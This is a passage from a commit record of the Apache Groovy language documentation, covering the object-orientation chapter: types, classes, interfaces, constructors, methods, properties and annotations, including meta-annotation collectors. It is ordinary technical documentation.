Generics\n\n(TBD)\n\n\ninclude::{projectdir}\/src\/spec\/doc\/core-traits.adoc[leveloffset=+1]\n\n","old_contents":"\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n Licensed to the Apache Software Foundation (ASF) under one\n or more contributor license agreements. See the NOTICE file\n distributed with this work for additional information\n regarding copyright ownership. The ASF licenses this file\n to you under the Apache License, Version 2.0 (the\n \"License\"); you may not use this file except in compliance\n with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing,\n software distributed under the License is distributed on an\n \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n KIND, either express or implied. See the License for the\n specific language governing permissions and limitations\n under the License.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n= Object orientation\n:jls: http:\/\/docs.oracle.com\/javase\/specs\/jls\/se8\/html\/\n\nThis chapter covers the object orientation of the Groovy programming language.\n\n== Types\n\n=== Primitive types\n\nGroovy supports the same primitive types as those defined by the {jls}[Java Language Specification]:\n\n* integral types: `byte` (8 bit), `short` (16 bit), `int` (32 bit) and `long` (64 bit)\n* floating-point types: `float` (32 bit) and `double` (64 bit)\n* `boolean` type (exactly `true` or `false`)\n* `char` type (16 bit, usable as a numeric type, representing an UTF-16 code)\n\nWhile Groovy declares and stores primitive fields and variables as primitives, because it uses Objects for\neverything, it autowraps references to primitives. Just like Java, the wrappers it uses are\n\n[cols=\"1,1\" options=\"header\"]\n.primitive wrappers\n|====\n| Primitive type\n| Wrapper class\n\n| boolean\n| Boolean\n\n| char\n| Character\n\n| short\n| Short\n\n| int\n| Integer\n\n| long\n| Long\n\n| float\n| Float\n\n| double\n| Double\n|====\n\nHere's an example using `int`\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/PrimitiveTest.groovy[tags=primitive_references,indent=0]\n----\n\nNow you may be concerned that this means every time you use a mathematical operator on a reference to a primitive\nthat you'll incur the cost of unboxing and reboxing the primitive. But this is not the case, as Groovy will compile\nyour operators into their link:core-operators.html#_operator-overloading[method equivalents] and uses those instead.\nAdditionally, Groovy will automatically unbox to a primitive when calling a Java method that takes a primitive\nparameter and automatically box primitive method return values from Java. However, be aware there are some\nlink:core-differences-java.html#_primitives_and_wrappers[differences] from Java's method resolution.\n\n=== Class\n\nGroovy classes are very similar to Java classes, being compatible to those ones at JVM level. They may have methods and fields\/properties, which can have the same modifiers (public, protected, private, static, etc) as Java classes.\n\nHere are key aspects of Groovy classes, that are different from their Java counterparts:\n\n* Public fields are turned into properties automatically, which results in less verbose code,\nwithout so many getter and setter methods. More on this aspect will be covered in the <<fields,fields and properties section>>.\n* Their declarations and any property or method without an access modifier are public.\n* Classes do not need to have the same name of the files where they are defined.\n* One file may contain one or more classes (but if a file contains no classes, it is considered a script).\n\nThe following code presents an example class.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_definition,indent=0]\n----\n<1> class beginning, with the name `Person`\n<2> string field and property named `name`\n<3> method definition\n\n\n==== Normal class\n\nNormal classes refer to classes which are top level and concrete. This means they can be instantiated without restrictions from any other classes or scripts. This way, they can only be public (even though the `public` keyword may be suppressed). Classes are instantiated by calling their constructors, using the `new` keyword, as in the following snippet.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_instantiation,indent=0]\n----\n\n\n==== Inner class\n\nInner classes are defined within another classes. The enclosing class can use the inner class as usual. On the other side, a inner class can access members of its enclosing class, even if they are private. Classes other than the enclosing class are not allowed to access inner classes. Here is an example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=inner_class,indent=0]\n----\n<1> the inner class is instantiated and its method gets called\n<2> inner class definition, inside its enclosing class\n<3> even being private, a field of the enclosing class is accessed by the inner class\n\nThere are some reasons for using inner classes:\n\n * They increase encapsulation by hiding the inner class from other classes, which do not need to know about it. This also leads to cleaner packages and workspaces.\n * They provide a good organization, by grouping classes that are used by only one class.\n * They lead to more maintainable codes, since inner classes are near the classes that use them.\n\nIn several cases, inner classes are implementation of interfaces whose methods are needed by the outer class. The code below illustrates this with the usage of threads, which are very common.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=inner_class2,indent=0]\n----\n\nNote that the class `Inner2` is defined only to provide an implementation of the method `run` to class `Outer2`. Anonymous inner classes help to eliminate verbosity in this case.\n\n\n===== Anonymous inner class\n\nThe last example of inner class can be simplified with an anonymous inner class. The same functionality can be achieved with the following code.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=anonymous_inner_class,indent=0]\n----\n<1> comparing with the last example of previous section, the `new Inner2()` was replaced by `new Runnable()` along with all its implementation\n<2> the method `start` is invoked normally\n\nThus, there was no need to define a new class to be used just once.\n\n\n==== Abstract class\n\nAbstract classes represent generic concepts, thus, they cannot be instantiated, being created to be subclassed. Their members include fields\/properties and abstract or concrete methods. Abstract methods do not have implementation, and must be implemented by concrete subclasses.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=abstract_class,indent=0]\n----\n<1> abstract classes must be declared with `abstract` keyword\n<2> abstract methods must also be declared with `abstract` keyword\n\nAbstract classes are commonly compared to interfaces. But there are at least two important differences of choosing one or another. First, while abstract classes may contain fields\/properties and concrete methods, interfaces may contain only abstract methods (method signatures). Moreover, one class can implement several interfaces, whereas it can extend just one class, abstract or not. \n\n=== Interface\n\nAn interface defines a contract that a class needs to conform to. An interface only defines a list of methods that need\nto be implemented, but does not define the methods implementation.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=interface_def_1,indent=0]\n----\n<1> an interface needs to be declared using the `interface` keyword\n<2> an interface only defines method signatures\n\nMethods of an interface are always *public*. It is an error to use `protected` or `private` methods in interfaces:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=protected_forbidden,indent=0]\n----\n<1> Using `protected` is a compile-time error\n\nA class _implements_ an interface if it defines the interface in its `implements` list or if any of its superclasses\ndoes:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_implements,indent=0]\n----\n<1> The `SystemGreeter` declares the `Greeter` interface using the `implements` keyword\n<2> Then implements the required `greet` method\n<3> Any instance of `SystemGreeter` is also an instance of the `Greeter` interface\n\nAn interface can extend another interface:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=extended_interface,indent=0]\n----\n<1> the `ExtendedGreeter` interface extends the `Greeter` interface using the `extends` keyword\n\nIt is worth noting that for a class to be an instance of an interface, it has to be explicit. For example, the following\nclass defines the `greet` method as it is declared in the `Greeter` interface, but does not declare `Greeter` in its\ninterfaces:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=no_structural_interface,indent=0]\n----\n\nIn other words, Groovy does not define structural typing. It is however possible to make an instance of an object\nimplement an interface at runtime, using the `as` coercion operator:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=interface_coercion,indent=0]\n----\n<1> create an instance of `DefaultGreeter` that does not implement the interface\n<2> coerce the instance into a `Greeter` at runtime\n<3> the coerced instance implements the `Greeter` interface\n\nYou can see that there are two distinct objects: one is the source object, a `DefaultGreeter` instance, which does not\nimplement the interface. The other is an instance of `Greeter` that delegates to the coerced object.\n\nTIP: Groovy interfaces do not support default implementation like Java 8 interfaces. If you are looking for something\nsimilar (but not equal), <<_traits,traits>> are close to interfaces, but allow default implementation as well as other\nimportant features described in this manual.\n\n=== Constructors\n\nConstructors are special methods used to initialize an object with a specific state. As with normal methods,\nit is possible for a class to declare more than one constructor, so long as each constructor has a unique\ntype signature. If an object doesn't require any parameters during construction, it may use a _no-arg_ constructor.\nIf no constructors are supplied, an empty no-arg constructor will be provided by the Groovy compiler. For constructors\nwith parameters, Groovy supports two invocation styles: using positional parameters or named parameters.\nThe former style is similar to how you would use Java constructors, while the second way\nallows one to specify parameter names when invoking the constructor.\n\n==== Positional argument constructor\n\nTo create an object by using positional argument constructors, the respective class needs to declare one or more\nconstructors. In the case of multiple constructors, each must have a unique type signature. The constructors can also\nadded to the class using the gapi:groovy.transform.TupleConstructor[] annotation.\n\nTypically, once at least one constructor is declared, the class can only be instantiated by having one of its\nconstructors called. It is worth noting that, in this case, you can't normally create the class with named parameters.\nGroovy does support named parameters so long as the class contains a no-arg constructor or a constructor which takes\na single `Map` argument - see the next section for details.\n\nThere are three forms of using a declared constructor. The first one is the normal Java way, with the `new` keyword.\nThe others rely on coercion of lists into the desired types. In this case, it is possible to coerce with the `as`\nkeyword and by statically typing the variable.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=constructor_positional_parameters,indent=0]\n----\n<1> Constructor declaration\n<2> Constructor invocation, classic Java way\n<3> Constructor usage, using coercion with `as` keyword\n<4> Constructor usage, using coercion in assignment\n\n\n==== Named argument constructor\n\nIf no (or a no-arg) constructor is declared, it is possible to create objects by passing parameters in the form of a\nmap (property\/value pairs). This can be in handy in cases where one wants to allow several combinations of parameters.\nOtherwise, by using traditional positional parameters it would be necessary to declare all possible constructors.\nHaving a constructor taking a single `Map` argument is also supported - such a constructor may also be added using\nthe gapi:groovy.transform.MapConstructor[] annotation.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=constructor_named_parameters,indent=0]\n----\n<1> No constructor declared\n<2> No parameters given in the instantiation\n<3> `name` parameter given in the instantiation\n<4> `age` parameter given in the instantiation\n<5> `name` and `age` parameters given in the instantiation\n\nIt is important to highlight, however, that this approach gives more power to the constructor caller,\nwhile imposing an increased responsibility on the caller to get the names and value types correct.\nThus, if greater control is desired, declaring constructors using positional parameters might be preferred.\n\nNotes:\n\n* While the example above supplied no constructor, you can also supply a no-arg constructor\nor a constructor with a single `Map` argument as previously mentioned.\n* You can support both named and positional construction\nby supply both positional constructors as well as a no-arg or Map constructor.\n* When no (or a no-arg) constructor is declared, Groovy replaces the named constructor call by a call\nto the no-arg constructor followed by calls to the setter for each supplied named property. So, you\nmight be better off using the Map constructor if your properties are declared as `final` (since they\nmust be set in the constructor rather than after the fact with setters).\n\n\n=== Methods\n\nGroovy methods are quite similar to other languages. Some peculiarities will be shown in the next subsections. \n\n==== Method definition\n\nA method is defined with a return type or with the `def` keyword, to make the return type untyped. A method can also receive any number of arguments, which may not have their types explicitly declared. Java modifiers can be used normally, and if no visibility modifier is provided, the method is public.\n\nMethods in Groovy always return some value. If no `return` statement is provided, the value evaluated in the last line executed will be returned. For instance, note that none of the following methods uses the `return` keyword.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=method_definition ,indent=0]\n----\n<1> Method with no return type declared and no parameter\n<2> Method with explicit return type and no parameter\n<3> Method with a parameter with no type defined\n<4> Static method with a String parameter\n\n==== Named arguments\n\nLike constructors, normal methods can also be called with named arguments. They need to receive the parameters as a map. In the method body, the values can be accessed as in normal maps (`map.key`).\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=named_arguments ,indent=0]\n----\n\n==== Default arguments\n\nDefault arguments make parameters optional. If the argument is not supplied, the method assumes a default value.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=default_arguments ,indent=0]\n----\n\nNote that no mandatory parameter can be defined after a default parameter is present, only other default parameters.\n\n==== Varargs\n\nGroovy supports methods with a variable number of arguments. They are defined like this: `def foo(p1, ..., pn, T... args)`.\nHere `foo` supports `n` arguments by default, but also an unspecified number of further arguments exceeding `n`.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_example,indent=0]\n----\n\nThis example defines a method `foo`, that can take any number of arguments, including no arguments at all.\n`args.length` will return the number of arguments given. Groovy allows `T[]` as a alternative notation to `T...`.\nThat means any method with an array as last parameter is seen by Groovy as a method that can take a variable number of arguments.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_array_notation,indent=0]\n----\n\nIf a method with varargs is called with `null` as the vararg parameter, then the argument will be `null` and not an array of length one with `null` as the only element.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_null_parameter,indent=0]\n----\n\nIf a varargs method is called with an array as an argument, then the argument will be that array instead of an array of length one containing the given array as the only element.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_array_parameter,indent=0]\n----\n\nAnother important point are varargs in combination with method overloading. In case of method overloading Groovy will select the most specific method.\nFor example if a method `foo` takes a varargs argument of type `T` and another method `foo` also takes one argument of type `T`, the second method is preferred.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_method_overloading,indent=0]\n----\n\n==== Method selection algorithm\n\n(TBD)\n\n==== Exception declaration\n\nGroovy automatically allows you to treat checked exceptions like unchecked exceptions.\nThis means that you don't need to declare any checked exceptions that a method may throw\nas shown in the following example which can throw a `FileNotFoundException` if the file isn't found:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=idiomatic_method_declaration,indent=0]\n----\n\nNor will you be required to surround the call to the `badRead` method in the previous example within a try\/catch\nblock - though you are free to do so if you wish.\n\nIf you wish to declare any exceptions that your code might throw (checked or otherwise) you are free to do so.\nAdding exceptions won't change how the code is used from any other Groovy code but can be seen as documentation\nfor the human reader of your code. The exceptions will become part of the method declaration in the bytecode,\nso if your code might be called from Java, it might be useful to include them.\nUsing an explicit checked exception declaration is illustrated in the following example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=checked_method_declaration,indent=0]\n----\n\n=== Fields and properties\n\n[[fields]]\n==== Fields\n\nA field is a member of a class or a trait which:\n\n* a mandatory _access modifier_ (`public`, `protected`, or `private`)\n* one or more optional _modifiers_ (`static`, `final`, `synchronized`)\n* an optional _type_\n* a mandatory _name_\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=field_declaration,indent=0]\n----\n<1> a `private` field named `id`, of type `int`\n<2> a `protected` field named `description`, of type `String`\n<3> a `public static final` field named _DEBUG_ of type `boolean`\n\nA field may be initialized directly at declaration:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=field_initialization,indent=0]\n----\n<1> the private field `id` is initialized with `IDGenerator.next()`\n\nIt is possible to omit the type declaration of a field. This is however considered a bad practice and in general it\nis a good idea to use strong typing for fields:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=typing_fields,indent=0]\n----\n<1> the field `mapping` doesn't declare a type\n<2> the field `mapping` has a strong type\n\nThe difference between the two is important if you want to use optional type checking later. It is also important\nfor documentation. However in some cases like scripting or if you want to rely on duck typing it may be interesting\nto omit the type.\n\n[[properties]]\n==== Properties\n\nA property is a combination of a private field and getters\/setters. You can define a property with:\n\n* an *absent* access modifier (no `public`, `protected` or `private`)\n* one or more optional _modifiers_ (`static`, `final`, `synchronized`)\n* an optional _type_\n* a mandatory _name_\n\nGroovy will then generate the getters\/setters appropriately. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=properties_definition,indent=0]\n----\n<1> creates a backing `private String name` field, a `getName` and a `setName` method\n<2> creates a backing `private int age` field, a `getAge` and a `setAge` method\n\nIf a property is declared `final`, no setter is generated:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=readonly_property,indent=0]\n----\n<1> defines a read-only property of type `String`\n<2> defines a read-only property of type `int`\n<3> assigns the `name` parameter to the `name` field\n<4> assigns the `age` parameter to the `age` field\n\nProperties are accessed by name and will call the getter or setter transparently, unless the code is in the class\nwhich defines the property:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=property_access,indent=0]\n----\n<1> `this.name` will directly access the field because the property is accessed from within the class that defines it\n<2> similarily a read access is done directly on the `name` field\n<3> write access to the property is done outside of the `Person` class so it will implicitly call `setName`\n<4> read access to the property is done outside of the `Person` class so it will implicitly call `getName`\n<5> this will call the `name` method on `Person` which performs a direct access to the field\n<6> this will call the `wonder` method on `Person` which performs a direct read access to the field\n\nIt is worth noting that this behavior of accessing the backing field directly is done in order to prevent a stack\noverflow when using the property access syntax within a class that defines the property.\n\nIt is possible to list the properties of a class thanks to the meta `properties` field of an instance:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=properties_meta,indent=0]\n----\n\nBy convention, Groovy will recognize properties even if there is no backing field\nprovided there are getters or setters\nthat follow the Java Beans specification. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=pseudo_properties,indent=0]\n----\n<1> writing `p.name` is allowed because there is a pseudo-property `name`\n<2> reading `p.age` is allowed because there is a pseudo-readonly property `age`\n<3> writing `p.groovy` is allowed because there is a pseudo-writeonly property `groovy`\n\nThis syntactic sugar is at the core of many DSLs written in Groovy.\n\n=== Annotation\n\n[[ann-definition]]\n==== Annotation definition\n\nAn annotation is a kind of special interface dedicated at annotating elements of the code. An annotation is a type which\nsuperinterface is the jdk:java.lang.annotation.Annotation[Annotation] interface. Annotations are declared in a very\nsimilar way to interfaces, using the `@interface` keyword:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=define_annotation,indent=0]\n----\n\nAn annotation may define members in the form of methods without bodies and an optional default value. The possible\nmember types are limited to:\n\n* primitive types\n* jdk:java.lang.String[Strings]\n* jdk:java.lang.Class[Classes]\n* an jdk:java.lang.Enum[enumeration]\n* another jdk:java.lang.annotation.Annotation[annotation type]\n* or any array of the above\n\nFor example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_string,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_string_default,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_int,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_class,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_annotation,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_enum,indent=0]\n----\n<1> an annotation defining a `value` member of type `String`\n<2> an annotation defining a `value` member of type `String` with a default value of `something`\n<3> an annotation defining a `step` member of type the primitive type `int`\n<4> an annotation defining a `appliesTo` member of type `Class`\n<5> an annotation defining a `value` member which type is an array of another annotation type\n<6> an annotation defining a `dayOfWeek` member which type is the enumeration type `DayOfWeek`\n\nUnlike in the Java language, in Groovy, an annotation can be used to alter the semantics of the language. It is especially\ntrue of AST transformations which will generate code based on annotations.\n\n[[ann-placement]]\n==== Annotation placement\n\nAn annotation can be applied on various elements of the code:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=apply_annotation_1,indent=0]\n----\n<1> `@SomeAnnotation` applies to the `someMethod` method\n<2> `@SomeAnnotation` applies to the `SomeClass` class\n<3> `@SomeAnnotation` applies to the `var` variable\n\nIn order to limit the scope where an annotation can be applied, it is necessary to declare it on the annotation\ndefinition, using the jdk:java.lang.annotation.Target[Target] annotation. For example, here is how you would\ndeclare that an annotation can be applied to a class or a method:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_target,indent=0]\n----\n<1> the `@Target` annotation is meant to annotate an annotation with a scope.\n<2> `@SomeAnnotation` will therefore only be allowed on `TYPE` or `METHOD`\n\nThe list of possible targets is available in the jdk:java.lang.annotation.ElementType[ElementType enumeration].\n\nWARNING: Groovy does not support the jdk:java.lang.annotation.ElementType#TYPE_PARAMETER[TYPE_PARAMETER] and\njdk:java.lang.annotation.ElementType#TYPE_PARAMETER[TYPE_USE] element types which were introduced in Java 8.\n\n==== Annotation member values\n\nWhen an annotation is used, it is required to set at least all members that do not have a default value. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotation_value_set,indent=0]\n----\n\nHowever it is possible to omit `value=` in the declaration of the value of an annotation if the member `value` is the\nonly one being set:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotation_value_set_option,indent=0]\n----\n<1> we can omit the `statusCode` because it has a default value, but `value` needs to be set\n<2> since `value` is the only mandatory member without a default, we can omit `value=`\n<3> if both `value` and `statusCode` need to be set, it is required to use `value=` for the default `value` member\n\n==== Retention policy\n\nThe visibility of an annotation depends on its retention policy. The retention policy of an annotation is set using\nthe jdk:java.lang.annotation.Retention[Retention] annotation:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_retention,indent=0]\n----\n<1> the `@Retention` annotation annotates the `@SomeAnnotation` annotation\n<2> so `@SomeAnnotation` will have a `SOURCE` retention\n\nThe list of possible retention targets and description is available in the\njdk:java.lang.annotation.RetentionPolicy[RetentionPolicy] enumeration. The\nchoice usually depends on whether you want an annotation to be visible at\ncompile time or runtime.\n\n==== Closure annotation parameters\n\nAn interesting feature of annotations in Groovy is that you can use a closure as an annotation value. Therefore\nannotations may be used with a wide variety of expressions and still have IDE support. For example, imagine a\nframework where you want to execute some methods based on environmental constraints like the JDK version or the OS.\nOne could write the following code:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_example,indent=0]\n----\n\nFor the `@OnlyIf` annotation to accept a `Closure` as an argument, you only have to declare the `value` as a `Class`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_def,indent=0]\n----\n\nTo complete the example, let's write a sample runner that would use that information:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_runner,indent=0]\n----\n<1> create a new instance of the class passed as an argument (the task class)\n<2> emulate an environment which is JDK 6 and not Windows\n<3> iterate on all declared methods of the task class\n<4> if the method is public and takes no-argument\n<5> try to find the `@OnlyIf` annotation\n<6> if it is found get the `value` and create a new `Closure` out of it\n<7> set the `delegate` of the closure to our environment variable\n<8> call the closure, which is the annotation closure. It will return a `boolean`\n<9> if it is `true`, call the method\n<10> if the method is not annotated with `@OnlyIf`, execute the method anyway\n<11> after that, return the task object\n\nThen the runner can be used this way:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_runner_exec,indent=0]\n----\n\n==== Meta-annotations\n\n===== Declaring meta-annotations\n\nMeta-annotations, also known as annotation aliases are annotations that\nare replaced at compile time by other annotations (one meta-annotation\nis an alias for one or more annotations). Meta-annotations can be used to\nreduce the size of code involving multiple annotations.\n\nLet\u2019s start with a simple example. Imagine you have the\u00a0`@Service`\nand\u00a0`@Transactional` annotations and that you want to annotate a class\nwith both:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=transactionalservice_class,indent=0]\n----\n\nGiven the multiplication of annotations that you could add to the same class, a meta-annotation\ncould help by reducing the two annotations with a single one having the very same semantics. For example,\nwe might want to write this instead:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=transactionalservice_class2,indent=0]\n----\n<1> `@TransactionalService` is a meta-annotation\n\nA meta-annotation is declared as a regular annotation but annotated with `@AnnotationCollector` and the\nlist of annotations it is collecting. In our case, the `@TransactionalService` annotation can be written:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=metaann_ts,indent=0]\n----\n<1> annotate the meta-annotation with `@Service`\n<2> annotate the meta-annotation with `@Transactional`\n<3> annotate the meta-annotation with `@AnnotationCollector`\n\n[[meta-ann-behavior]]\n===== Behavior of meta-annotations\n\nGroovy supports both _precompiled_ and _source form_\nmeta-annotations. This means that your meta-annotation\u00a0_may_ be\nprecompiled, or you can have it in the same source tree as the one you\nare currently compiling.\n\nINFO: Meta-annotations are a Groovy-only feature. There is\nno chance for you to annotate a Java class with a meta-annotation and\nhope it will do the same as in Groovy. Likewise, you cannot write a\nmeta-annotation in Java: both the meta-annotation definition\u00a0*and* usage\nhave to be Groovy code. But you can happily collect Java annotations\nand Groovy annotations within your meta-annotation.\n\nWhen the Groovy compiler encounters a class annotated with a\nmeta-annotation, it\u00a0*replaces* it with the collected annotations. So,\nin our previous example, it will\nreplace\u00a0`@TransactionalService` with\u00a0`@Transactional` and\u00a0`@Service`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotations_expanded,indent=0]\n----\n\nThe conversion from a meta-annotation to the collected annotations is performed during the\n_semantic analysis_ compilation phase.\u00a0\n\nIn addition to replacing the alias with the collected annotations, a meta-annotation is capable of\nprocessing them, including arguments.\n\n[[meta-ann-members]]\n===== Meta-annotation parameters\n\nMeta-annotations can collect annotations which have parameters. To illustrate this,\nwe will imagine two annotations, each of them accepting one argument:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collected_ann_explosive,indent=0]\n----\n\nAnd suppose that you want create a meta-annotation named\u00a0`@Explosive`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collected_ann_explosive,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collector_ann_explosive,indent=0]\n----\n\nBy default, when the annotations are replaced, they will get the\nannotation parameter values *as they were defined in the alias*. More interesting,\nthe meta-annotation supports overriding specific values:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=example_bomb,indent=0]\n----\n<1> the `after` value provided as a parameter to\u00a0`@Explosive` overrides the one defined in the `@Timeout` annotation\n\nIf two annotations define the same parameter name, the default processor\nwill copy the annotation value to all annotations that accept this parameter:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collector_ann_same_values,indent=0]\n----\n<1> the `@Foo` annotation defines the `value` member of type `String`\n<2> the `@Bar` annotation also defines the `value` member of type `String`\n<3> the `@FooBar` meta-annotation aggregates `@Foo` and `@Bar`\n<4> class `Bob` is annotated with `@Foo` and `@Bar`\n<5> the value of the `@Foo` annotation on `Bob` is `a`\n<6> while the value of the `@Bar` annotation on `Bob` is `b`\n<7> class `Joe` is annotated with `@FooBar`\n<8> then the value of the `@Foo` annotation on `Joe` is `a`\n<9> and the value of the `@Bar` annotation on `Joe` is also `a`\n\nIn the second case, the meta-annotation value was copied in\nboth `@Foo` and `@Bar` annotations.\n\nWARNING: It is a compile time error if the collected annotations define the same members\nwith incompatible types. For example if on the previous example `@Foo` defined a value of\ntype `String` but `@Bar` defined a value of type `int`.\n\nIt is however possible to customize the behavior of meta-annotations and describe how collected\nannotations are expanded. We'll look at how to do that shortly but first there is an advanced\nprocessing option to cover.\n\n[[handling_duplicate_annotations]]\n===== Handling duplicate annotations\n\nThe `@AnnotationCollector` annotation supports a `mode` parameter which can be used to\nalter how the default processor handles annotation replacement in the presence of\nduplicate annotations.\n\nINFO: Custom processors (discussed next) may or may not support this parameter.\n\nAs an example, suppose you create a meta-annotation containing the `@ToString` annotation\nand then place your meta-annotation on a class that already has an explicit `@ToString`\nannotation. Should this be an error? Should both annotations be applied? Does one take\npriority over the other? There is no correct answer. In some scenarios it might be\nquite appropriate for any of these answers to be correct. So, rather than trying to\npreempt one correct way to handle the duplicate annotation issue, Groovy let's you\nwrite your own custom meta-annotation processors (covered next) and let's you write\nwhatever checking logic you like within AST transforms - which are a frequent target for\naggregating. Having said that, by simply setting the `mode`, a number of commonly\nexpected scenarios are handled automatically for you within any extra coding.\nThe behavior of the `mode` parameter is determined by the `AnnotationCollectorMode`\nenum value chosen and is summarized in the following table.\n\n|================================\n| Mode | Description\n| DUPLICATE | Annotations from the annotation collection will always be inserted. After all transforms have been run, it will be an error if multiple annotations (excluding those with SOURCE retention) exist.\n| PREFER_COLLECTOR | Annotations from the collector will be added and any existing annotations with the same name will be removed.\n| PREFER_COLLECTOR_MERGED | Annotations from the collector will be added and any existing annotations with the same name will be removed but any new parameters found within existing annotations will be merged into the added annotation.\n| PREFER_EXPLICIT | Annotations from the collector will be ignored if any existing annotations with the same name are found.\n| PREFER_EXPLICIT_MERGED | Annotations from the collector will be ignored if any existing annotations with the same name are found but any new parameters on the collector annotation will be added to existing annotations.\n|================================\n\n[[meta-ann-processor]]\n===== Custom annotation processors\n\nA custom annotation processor will let you choose how to expand a\nmeta-annotation into collected annotations. The behaviour of the meta-annotation is,\nin this 